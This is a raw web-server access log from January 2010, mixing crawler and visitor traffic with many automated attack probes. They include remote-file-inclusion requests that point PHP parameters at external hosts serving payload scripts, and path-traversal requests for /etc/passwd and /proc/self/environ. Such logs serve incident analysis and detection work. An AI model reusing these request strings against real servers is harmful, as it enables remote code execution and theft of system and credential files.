125.160.17.200 - - [05/Jan/2010:04:29:01 -0500] "GET /logs/access_log.Q109090900%20%20/main.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.195.114.54 - - [05/Jan/2010:04:28:16 -0500] "GET /logs/access_log.Q109070900 HTTP/1.0" 200 4950912 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.114.54 - - [05/Jan/2010:04:29:37 -0500] "GET /images/_notes/headline_buy5.jpg.mno HTTP/1.0" 200 190 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [05/Jan/2010:04:30:45 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.246.32.199 - - [05/Jan/2010:04:30:46 -0500] "GET /logs/index.php?page=/../../../../../../../../etc/passwd HTTP/1.1" 404 212 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
218.246.32.199 - - [05/Jan/2010:04:30:46 -0500] "GET /index.php?page=/../../../../../../../../etc/passwd HTTP/1.1" 404 207 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
64.34.177.222 - - [05/Jan/2010:04:31:23 -0500] "GET /logs/access_log.Q109112600//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:04:31:32 -0500] "GET /logs/access_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:04:31:32 -0500] "GET /logs/access_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:04:31:37 -0500] "GET /logs/access_log.Q109103000%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:04:31:37 -0500] "GET /logs/access_log.Q109101300%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
95.108.128.242 - - [05/Jan/2010:04:30:01 -0500] "GET /logs/access_log.Q109111800 HTTP/1.1" 200 8619981 "-" "Yandex/1.01.001 (compatible; Win16; I)"
200.93.147.154 - - [05/Jan/2010:04:31:55 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:04:31:55 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:04:31:55 -0500] "GET /logs/access_log.Q109082500/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:04:32:03 -0500] "GET /logs/access_log.Q109101800/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:32:31 -0500] "GET /logs/bbs/board.php?board_skin_path=http://via.wen.ru/id1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:32:31 -0500] "GET /logs/access_log.Q109112100%20%20/bbs/board.php?board_skin_path=http://via.wen.ru/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:32:31 -0500] "GET /bbs/board.php?board_skin_path=http://via.wen.ru/id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:32:38 -0500] "GET /logs/bbs/board.php?board_skin_path=http://via.wen.ru/id1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:32:38 -0500] "GET /bbs/board.php?board_skin_path=http://via.wen.ru/id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:32:38 -0500] "GET /logs/access_log.Q109112100/bbs/board.php?board_skin_path=http://via.wen.ru/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:32:57 -0500] "GET /logs/access_log.Q109102700%20%20/bbs/board.php?board_skin_path=http://via.wen.ru/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:33:17 -0500] "GET /logs/access_log.Q109061000///vwar/backup/errors.php?error=http://www.hfsb.org//webmail/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:33:17 -0500] "GET /logs/access_log.Q109052400///vwar/backup/errors.php?error=http://www.hfsb.org//webmail/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:33:25 -0500] "GET /logs/access_log.Q109061000///vwar/backup/errors.php?error=http://www.hfsb.org//webmail/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:33:29 -0500] "GET /logs/access_log.Q109061000///vwar/backup/errors.php?error=http://www.hfsb.org//webmail/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:33:29 -0500] "GET /logs/access_log.Q109052400///vwar/backup/errors.php?error=http://www.hfsb.org//webmail/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:33:29 -0500] "GET /logs/access_log.Q109052400///vwar/backup/errors.php?error=http://www.hfsb.org//webmail/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:04:33:37 -0500] "GET /logs/access_log.Q109103000%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:04:33:37 -0500] "GET /logs/access_log.Q109101300%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:33:49 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://via.wen.ru/id1.txt? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:33:49 -0500] "GET /logs/access_log.Q109052100/////?_SERVER[DOCUMENT_ROOT]=http://via.wen.ru/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:33:49 -0500] "GET /logs/access_log.Q109101600/////?_SERVER[DOCUMENT_ROOT]=http://via.wen.ru/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:33:49 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://via.wen.ru/id1.txt? HTTP/1.1" 200 32916 "-" "Mozilla/5.0"
200.234.200.155 - - [05/Jan/2010:04:33:53 -0500] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
200.234.200.155 - - [05/Jan/2010:04:33:53 -0500] "GET /logs/access_log.Q109090300/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.234.200.155 - - [05/Jan/2010:04:33:53 -0500] "GET /logs/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
200.234.200.155 - - [05/Jan/2010:04:34:04 -0500] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
200.234.200.155 - - [05/Jan/2010:04:34:37 -0500] "GET /logs/access_log.Q109090600/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.234.200.155 - - [05/Jan/2010:04:34:38 -0500] "GET /logs/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
200.234.200.155 - - [05/Jan/2010:04:34:38 -0500] "GET /logs/access_log.Q109090300%20%20/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.234.200.155 - - [05/Jan/2010:04:34:38 -0500] "GET /logs/access_log.Q109090600%20%20/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.195.114.54 - - [05/Jan/2010:04:35:11 -0500] "GET /images/_notes/home_welcome_bkgrd_.gif.mno HTTP/1.0" 200 249 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
200.234.200.155 - - [05/Jan/2010:04:35:32 -0500] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
200.234.200.155 - - [05/Jan/2010:04:35:32 -0500] "GET /logs/access_log.Q109090600/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.234.200.155 - - [05/Jan/2010:04:35:32 -0500] "GET /logs/access_log.Q109090300/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.234.200.155 - - [05/Jan/2010:04:35:32 -0500] "GET /logs/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
123.125.66.60 - - [05/Jan/2010:04:35:43 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
81.2.201.96 - - [05/Jan/2010:04:36:03 -0500] "GET /logs/access_log.Q109072900/main.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:04:36:08 -0500] "GET /logs/error_log.Q109071800/main.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
212.175.5.130 - - [05/Jan/2010:04:36:17 -0500] "GET /logs/access_log.Q109112600//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:04:36:18 -0500] "GET /logs/access_log.Q109072900/main.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:04:36:22 -0500] "GET /logs/error_log.Q109071800/main.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
67.195.114.54 - - [05/Jan/2010:04:36:28 -0500] "GET /images/_notes/download_RCM_info.jpg.mno HTTP/1.0" 200 260 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.55.143.249 - - [05/Jan/2010:04:37:11 -0500] "GET /logs/access_log.Q109052100%20%20/////?_SERVER[DOCUMENT_ROOT]=http://via.wen.ru/id1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:04:37:11 -0500] "GET /logs/access_log.Q109101600%20%20/////?_SERVER[DOCUMENT_ROOT]=http://via.wen.ru/id1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
200.234.200.155 - - [05/Jan/2010:04:37:56 -0500] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
200.234.200.155 - - [05/Jan/2010:04:37:56 -0500] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
200.234.200.155 - - [05/Jan/2010:04:37:56 -0500] "GET /logs/error_log.Q109071400%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
200.234.200.155 - - [05/Jan/2010:04:37:56 -0500] "GET /logs/access_log.Q109071400%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
200.234.200.155 - - [05/Jan/2010:04:38:44 -0500] "GET /logs/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
200.234.200.155 - - [05/Jan/2010:04:38:44 -0500] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
200.234.200.155 - - [05/Jan/2010:04:38:44 -0500] "GET /logs/access_log.Q109090300/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.234.200.155 - - [05/Jan/2010:04:38:44 -0500] "GET /logs/access_log.Q109090600/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
187.45.193.142 - - [05/Jan/2010:04:39:11 -0500] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 247 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
95.108.128.242 - - [05/Jan/2010:04:39:24 -0500] "GET /logs/access_log.Q109121400 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
209.59.12.99 - - [05/Jan/2010:04:39:36 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.195.114.54 - - [05/Jan/2010:04:40:01 -0500] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS HTTP/1.0" 200 45922 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
187.45.193.142 - - [05/Jan/2010:04:40:26 -0500] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 252 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
211.218.126.236 - - [05/Jan/2010:04:40:31 -0500] "GET /logs/error_log.Q109082500%20%20///skin/zero_vote/error.php?dir=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:04:40:31 -0500] "GET /logs///skin/zero_vote/error.php?dir=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:04:40:31 -0500] "GET ///skin/zero_vote/error.php?dir=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:04:40:36 -0500] "GET /logs/error_log.Q109081600%20%20///skin/zero_vote/error.php?dir=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:04:40:39 -0500] "GET /logs/error_log.Q109082500%20%20///skin/zero_vote/error.php?dir=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:04:40:39 -0500] "GET /logs///skin/zero_vote/error.php?dir=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:04:40:39 -0500] "GET ///skin/zero_vote/error.php?dir=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:04:40:44 -0500] "GET /logs/error_log.Q109081600%20%20///skin/zero_vote/error.php?dir=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
200.234.200.155 - - [05/Jan/2010:04:42:06 -0500] "GET /logs/error_log.Q109071400//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
200.234.200.155 - - [05/Jan/2010:04:42:06 -0500] "GET /logs/access_log.Q109071400//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:04:43:15 -0500] "GET /logs/access_log.Q109101500///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:04:43:15 -0500] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:04:43:15 -0500] "GET ///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
67.195.114.54 - - [05/Jan/2010:04:42:30 -0500] "GET /logs/access_log.Q109081000 HTTP/1.0" 200 5307504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.218.126.236 - - [05/Jan/2010:04:43:34 -0500] "GET /logs/access_log.Q109092900%20%20///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:04:43:34 -0500] "GET ///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:04:43:34 -0500] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
81.169.178.35 - - [05/Jan/2010:04:43:35 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://beautyengg.com/README?? HTTP/1.0" 404 223 "-" "Mozilla/5.0"
81.169.178.35 - - [05/Jan/2010:04:43:35 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://beautyengg.com/README?? HTTP/1.0" 404 228 "-" "Mozilla/5.0"
81.169.178.35 - - [05/Jan/2010:04:43:35 -0500] "GET /logs/access_log.Q109111100//tools/send_reminders.php?noSet=0&includedir=http://beautyengg.com/README?? HTTP/1.0" 404 250 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:04:43:40 -0500] "GET /logs/error_log.Q109080300%20%20///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:04:44:16 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:04:44:16 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:04:44:16 -0500] "GET /logs/access_log.Q109091700%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:04:44:17 -0500] "GET /logs/access_log.Q109091700%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:04:44:17 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:04:44:17 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:04:44:20 -0500] "GET /logs/access_log.Q109070700%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:04:44:20 -0500] "GET /logs/access_log.Q109070700%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.246.32.199 - - [05/Jan/2010:04:44:51 -0500] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../../../../etc/passwd HTTP/1.1" 404 252 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
218.246.32.199 - - [05/Jan/2010:04:44:51 -0500] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../../../../etc/passwd HTTP/1.1" 404 247 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
81.169.178.35 - - [05/Jan/2010:04:45:29 -0500] "GET /logs/access_log.Q109111100%20%20//tools/send_reminders.php?noSet=0&includedir=http://beautyengg.com/README?? HTTP/1.0" 404 252 "-" "Mozilla/5.0"
95.108.128.242 - - [05/Jan/2010:04:47:04 -0500] "GET /logs/error_log.Q109062900 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
200.234.200.155 - - [05/Jan/2010:04:48:26 -0500] "GET /logs/access_log.Q109092200//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
122.201.76.100 - - [05/Jan/2010:04:48:57 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
122.201.76.100 - - [05/Jan/2010:04:48:57 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
122.201.76.100 - - [05/Jan/2010:04:48:57 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 200 32915 "-" "Mozilla/5.0"
122.201.76.100 - - [05/Jan/2010:04:48:57 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 200 32915 "-" "Mozilla/5.0"
122.201.76.100 - - [05/Jan/2010:04:49:05 -0500] "GET /logs/access_log.Q109111200////?_SERVER[DOCUMENT_ROOT]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
122.201.76.100 - - [05/Jan/2010:04:49:05 -0500] "GET /logs/access_log.Q109102300////?_SERVER[DOCUMENT_ROOT]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
122.201.76.100 - - [05/Jan/2010:04:49:06 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
122.201.76.100 - - [05/Jan/2010:04:49:06 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 200 32915 "-" "Mozilla/5.0"
124.104.155.14 - - [05/Jan/2010:04:49:08 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en; rv:1.9.0.16) Gecko/2009120123 Camino/2.0.1 (like Firefox/3.0.16)"
124.104.155.14 - - [05/Jan/2010:04:49:08 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en; rv:1.9.0.16) Gecko/2009120123 Camino/2.0.1 (like Firefox/3.0.16)"
124.104.155.14 - - [05/Jan/2010:04:49:13 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en; rv:1.9.0.16) Gecko/2009120123 Camino/2.0.1 (like Firefox/3.0.16)"
124.104.155.14 - - [05/Jan/2010:04:49:13 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en; rv:1.9.0.16) Gecko/2009120123 Camino/2.0.1 (like Firefox/3.0.16)"
122.201.76.100 - - [05/Jan/2010:04:49:22 -0500] "GET /logs/access_log.Q109111200////?_SERVER[DOCUMENT_ROOT]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
122.201.76.100 - - [05/Jan/2010:04:49:22 -0500] "GET /logs/access_log.Q109102300////?_SERVER[DOCUMENT_ROOT]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:04:49:23 -0500] "GET /logs/access_log.Q109083000%20%20///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:04:49:23 -0500] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:04:49:23 -0500] "GET ///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:04:49:23 -0500] "GET /logs/error_log.Q109083000%20%20///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
122.201.76.100 - - [05/Jan/2010:04:49:32 -0500] "GET /logs/access_log.Q109102300%20%20////?_SERVER[DOCUMENT_ROOT]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
122.201.76.100 - - [05/Jan/2010:04:49:35 -0500] "GET /logs/access_log.Q109111200%20%20////?_SERVER[DOCUMENT_ROOT]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
122.201.76.100 - - [05/Jan/2010:04:49:35 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
122.201.76.100 - - [05/Jan/2010:04:49:35 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 200 32915 "-" "Mozilla/5.0" 122.201.76.100